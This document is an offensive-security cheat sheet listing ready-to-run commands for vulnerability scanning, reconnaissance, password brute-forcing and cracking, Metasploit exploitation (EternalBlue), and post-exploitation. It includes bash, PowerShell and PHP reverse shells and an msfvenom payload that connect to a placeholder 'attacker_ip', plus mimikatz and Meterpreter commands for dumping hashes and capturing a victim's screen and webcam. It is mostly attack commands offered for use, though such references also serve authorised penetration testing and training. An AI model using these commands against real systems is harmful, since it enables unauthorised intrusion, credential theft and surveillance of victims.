01
Vulnerability Scanning
Web Scanners
Web server vulnerability scanner
nikto -h http://target.com
Scan WordPress for vulnerabilities
wpscan --url http://target.com
Fast CVE scanning with templates
nuclei -t cves/ -u http://target.com
Fast web path and directory scanner
dirsearch -u http://target.com
App & Inject Scanners
Detect SQL injection
sqlmap -u "http://target.com/page.php?id=1" --dbs
Fast brute-force on directories
gobuster dir -u http://target.com -w wordlist.txt
Automatic XSS injection framework
xsser --all=http://target.com
System & Local Scans
Search for local exploits
searchsploit apache 2.4
Start OpenVAS vulnerability scanner
openvas-start
Full system security audit
lynis audit system
Nmap vulnerability script scan
nmap --script vuln target.com
02
System Access & Reverse Shells
Native Shells & Listeners
Start netcat listener
nc -lvnp 4444
Interactive reverse shell upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
Bash reverse shell
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
Socat listener shell
socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
Scripting Shells & Payloads
PowerShell reverse shell
powershell -nop -c "$client = New-Object
System.Net.Sockets.TCPClient('attacker_ip',4444);"
PHP reverse shell
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i
<&3 >&3 2>&3");'
Create payload executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip
LPORT=4444 -f exe > shell.exe
03
Password Attacks
Online Brute-Force
Brute-force HTTP login
hydra -l admin -P rockyou.txt target.com http-get
Network auth crack (SSH/RDP)
ncrack -p 22 --user admin --pass wordlist.txt target.com
Fast parallel brute-forcer
medusa -h
SSH brute-force
patator ssh_login host=ip user=FILE0 password=FILE1 0=user.txt
1=pass.txt
Offline Cracking & Wordlists
Crack password hashes
john --wordlist=rockyou.txt hash.txt
GPU-based password cracking
hashcat -m 0 hash.txt rockyou.txt
Generate wordlist from website
cewl http://target.com -w wordlist.txt
Create custom wordlists
crunch 6 10 abcdef1234
Crack ZIP passwords
fcrackzip -u -D -p rockyou.txt file.zip
04
Post-Exploitation
System & Privileges
Show current user
meterpreter > getuid
View running processes
ps
List users on Windows
wmic useraccount list brief
Check active connections and ports
netstat -ano
Check user Sudo permissions
sudo -l
Privilege Escalation Enum script
linpeas.sh
Data & Credentials EXFIL
Extract password hashes
meterpreter > hashdump
Host files via python HTTP server
python3 -m http.server 80
Extract credentials on Windows
mimikatz
Take a screenshot from the victim
meterpreter > screenshot
Capture image from webcam
meterpreter > webcam_snap
05
Exploitation
Metasploit Framework
Launch Metasploit Framework
msfconsole
Search Metasploit for Windows exploits
search type:exploit platform:windows
EternalBlue exploit
use exploit/windows/smb/ms17_010_eternalblue
Set remote host target
set RHOST target_ip
Set Meterpreter payload
set PAYLOAD windows/meterpreter/reverse_tcp
Execute exploit
run
Custom & Public Exploits
Search for proof-of-concept exploits
exploit-db.com
Run custom exploit scripts
python3 exploit.py
Compile C exploit
gcc exploit.c -o exploit
Copy exploit directly to current folder
searchsploit -m 12345
06
Information Gathering
Network & DNS Recon
Stealth scan with OS & service detection
nmap -sS -A target.com
Domain WHOIS information
whois target.com
DNS enumeration
dnsenum target.com
Resolve DNS to IP
nslookup target.com
Web & OSINT
Automated OSINT reconnaissance framework
recon-ng
Email & subdomain gathering via search engines
theharvester -d target.com -b all
Detect technologies and server info
whatweb http://target.com
Directory brute-forcing
dirb http://target.com/
Fast web fuzzer (directory/files)
ffuf -w wordlist.txt -u http://target.com/FUZZ